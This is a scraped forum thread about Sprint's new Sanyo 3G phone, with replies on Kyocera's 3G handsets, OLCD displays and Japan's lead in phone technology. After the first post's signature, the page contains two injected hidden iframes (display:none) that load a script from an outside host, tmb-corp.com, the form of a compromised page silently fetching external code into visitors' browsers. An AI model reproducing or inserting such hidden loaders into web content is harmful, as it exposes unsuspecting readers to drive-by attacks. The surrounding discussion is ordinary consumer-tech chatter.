+ Reply to Thread
    smartphonecentral.com

Sprint's new 3G phone (Sanyo)

Looks neat... Wonder what Samsung's got up their sleeve.

http://www.infosync.no/show.php?id=1314

--Jesse<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

yes, thats a very neat looking puppy there. but by the time those services are available, there will be more companies out there besides sanyo and samsung... dont forget kyocera who has a 3g compatibile phone out right now for sprint, 'course its not a phone/pda...

that kyocera phone is only 3g voice capable(increased battery life and tower capacity)..the 3g data capable won't be available till summer at the earliest

Administrator

Arrow

Originally posted by stankcrunk
    that kyocera phone is only 3g voice capable(increased battery life and tower capacity)..the 3g data capable won't be available till summer at the earliest
    thats what i was referring to...perhaps i should have made it more clearer..

even thogh they say summer, id bet more later in the year...

I saw that bad boy on TechTV's Fresh Gear CES report. They said it had a new screen technology that surpasses regular LCD displays, as this new technology is much more crisp, brighter and much more energy efficient.

What would we do without TechTV?

Administrator

Arrow

Originally posted by Stillen_I30
    I saw that bad boy on TechTV's Fresh Gear CES report. They said it had a new screen technology that surpasses regular LCD displays, as this new technology is much more crisp, brighter and much more energy efficient.
    OLCD or Organic LCD is not new.. it has been around for a few years.. pioneer has used it in one of their car audio lines. i believe sanyo is hoked up with kodak to make this the first FULL color olcd..

I visited Tokyo two years ago, and even then, they were selling cell phones with implemented digital cameras in them. The Sanyo will of course be out over there this summer, and we wont even see it until sometime in 2003. I dislike this lag in technology here, how come they get to play with all the newest toys first!?

...maybe because its "their" technology!

Although OLCD is not new, in fact one of Sprint's phones has been already using it (I think),,, The development of it has been an ongoing effort. It has only been in the last few years that they developed techniques to make it reliable enough for consumer electronics. The growth of the product line has been slow and finally hitting the PDA level market recently.

The really cool thing about it is its viewable angle. In that area it far exceeds todays TFT displays on laptops. I'm looking forward to seeing it on laptops, desktop displays, and even full size HDTVs.
    Let he who is without sin cast the first stone.

OUCH!!!